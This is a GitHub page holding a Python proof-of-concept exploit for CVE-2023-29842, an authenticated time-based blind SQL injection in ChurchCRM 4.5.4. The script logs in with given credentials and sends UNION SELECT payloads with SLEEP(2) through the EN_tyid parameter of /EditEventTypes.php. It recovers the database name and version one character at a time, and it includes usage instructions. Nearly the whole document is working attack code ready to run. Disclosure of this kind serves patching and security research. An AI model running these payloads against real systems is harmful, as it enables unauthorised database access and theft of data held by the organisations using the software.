Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
# Exploit Title: ChurchCRM 4.5.4 - Authenticated Blind SQL Injection via the EN_tyid POST parameter
# Date: 03-05-2023
# Exploit Author: Arvandy
# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-29842/CVE-2023-29842.md
# Software Link: https://github.com/ChurchCRM/CRM/releases
# Vendor Homepage: http://churchcrm.io/
# Version: 4.5.4
# Tested on: Windows, Linux
# CVE: CVE-2023-29842
"""
The endpoint /EditEventTypes.php is vulnerable to Blind SQL Injection (Time-based) via the EN_tyid POST parameter.
This endpoint can be triggered through the following menu: Events - List Event Types - Edit Event Types - Save Name.
The EN_tyid Parameter is taken directly from the user input and passed into the SQL query without any sanitization or input escaping.
This allows the attacker to inject malicious Event payloads to execute the malicious SQL query.
This script is created as Proof of Concept to retrieve the database name and version.
"""
import sys, requests
def injection(target, inj_str, session_cookies):
for j in range(32, 126):
url = "%s/EditEventTypes.php" % (target)
headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'CRM-2c90cf299230a50dab55aee824ed9b08='+str(session_cookies)}
data = "EN_tyid=%s&EN_ctid=&newEvtName=NewEvent&Action=NAME&newEvtStartTime=09:30:00&newCountName=" % (inj_str.replace("[CHAR]", str(j)))
r = requests.post(url, headers=headers, data=data)
res = r.text
if (r.elapsed.total_seconds () > 2 ):
return j
return None
def retrieveDBName(session_cookies):
db_name = ""
print("(+) Retrieving database name, please wait")
for i in range (1,100):
injection_str = "1'+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,IF(ASCII(SUBSTRING((SELECT+DATABASE()),%d,1))=[CHAR],SLEEP(2),null)-- -" % i
retrieved_value = injection(target, injection_str, session_cookies)
if (retrieved_value):
db_name += chr(retrieved_value)
else:
break
print("Database Name: "+db_name)
def retrieveDBVersion(session_cookies):
db_version = ""
print("(+) Retrieving database version, please wait")
for i in range (1,100):
injection_str = "1'+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,IF(ASCII(SUBSTRING((SELECT+@@version),%d,1))=[CHAR],SLEEP(2),null)-- -" % i
retrieved_value = injection(target, injection_str, session_cookies)
if (retrieved_value):
db_version += chr(retrieved_value)
else:
break
print("Database Version: "+db_version)
def login(target, username, password):
target = "%s/session/begin" % (target)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
data = "User=%s&Password=%s" % (username, password)
s = requests.session()
r = s.post(target, data = data, headers = headers)
return s.cookies.get('CRM-2c90cf299230a50dab55aee824ed9b08')
def main():
print("(!) Login to the target application")
session_cookies = login(target, username, password)
print("(!) Exploiting the Blind Auth SQL Injection to retrieve database name and versions")
retrieveDBName(session_cookies)
print("")
retrieveDBVersion(session_cookies)
if __name__ == "__main__":
if len(sys.argv) != 4:
print("(!) Usage: python3 exploit.py <URL> <username> <password>")
print("(!) E.g.,: python3 exploit.py http://192.168.1.100/ChurchCRM user pass")
sys.exit(-1)
target = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
main()